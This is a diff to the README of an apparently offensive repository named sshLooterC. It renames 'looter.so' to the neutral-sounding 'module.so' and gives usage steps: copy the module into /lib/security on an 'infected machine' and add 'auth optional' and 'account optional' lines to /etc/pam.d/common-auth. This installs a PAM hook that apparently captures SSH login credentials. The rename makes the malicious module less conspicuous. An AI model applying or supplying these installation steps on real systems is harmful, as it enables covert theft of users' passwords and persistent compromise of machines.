Cvar1984/sshLooterC/README.md

 ```

 # Usage
-Copy the `looter.so` to the infected machine on `/lib/security`, then edit the `/etc/pam.d/common-auth` and add the following lines.
+Copy the `module.so` to the infected machine on `/lib/security`, then edit the `/etc/pam.d/common-auth` and add the following lines.
 ```
 auth optional module.so
 account optional module.so